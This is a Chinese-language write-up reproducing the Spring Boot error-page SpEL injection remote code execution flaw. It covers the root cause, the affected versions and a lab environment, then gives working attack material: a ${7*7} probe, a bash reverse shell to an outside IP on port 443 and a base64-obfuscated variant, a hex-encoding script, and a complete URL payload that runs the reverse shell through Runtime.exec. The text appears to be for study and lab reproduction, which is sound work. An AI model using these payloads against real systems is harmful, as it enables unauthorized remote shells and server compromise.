0x01 漏洞原理
- spring boot 處理參數值出錯,流程進入
org.springframework.util.PropertyPlaceholderHelper類中 - 此時 URL 中的參數值會用
parseStringValue方法進行遞歸解析。 - 其中
${}包圍的內容都會被org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration類的resolvePlaceholder方法當作 SpEL 表達式被解析執行,造成 RCE 漏洞。
0x02 利用條件
- spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0。
- 至少知道一個觸發 springboot 默認錯誤頁面的接口及參數名。
0x03 漏洞復現
1、漏洞環境:
https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce
2、尋找一個正常傳參處,在本例中以/article?id=xxx爲例,實戰可以通過burpsuite等工具fuzz。若網站狀態碼返回爲500,則後續測試可在此id參數進行。
輸入 /article?id=${7*7} ,如果發現報錯頁面將 7*7 的值 49 計算出來顯示在報錯頁面上,那麼基本可以確定目標存在 SpEL 表達式注入漏洞。
2、編輯腳本,將反彈shell的命令轉換爲java字節形式。
bash -i >& /dev/tcp/140.143.30.49/443 0>& 1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNDAuMTQzLjMwLjQ5LzQ0MyAwPiYgMQ==}|{base64,-d}|{bash,-i}
# coding: utf-8
result = ""
target = 'open -a Calculator'
for x in target:
result += hex(ord(x)) + ","
print(result.rstrip(','))
3、攻擊機nc監聽,執行如下payload。
http://192.168.3.136:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]
{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x2b,0x4a,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x78,0x4e,0x44,0x41,0x75,0x4d,0x54,0x51,0x7a,0x4c,0x6a,0x4d,0x77,0x4c,0x6a,0x51,0x35,0x4c,0x7a,0x51,0x30,0x4d,0x79,0x41,0x77,0x50,0x69,0x59,0x67,0x4d,0x51,0x3d,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d}))}
0x04 參考
https://github.com/LandGrey/SpringBootVulExploit
https://www.cnblogs.com/litlife/p/10183137.html 原理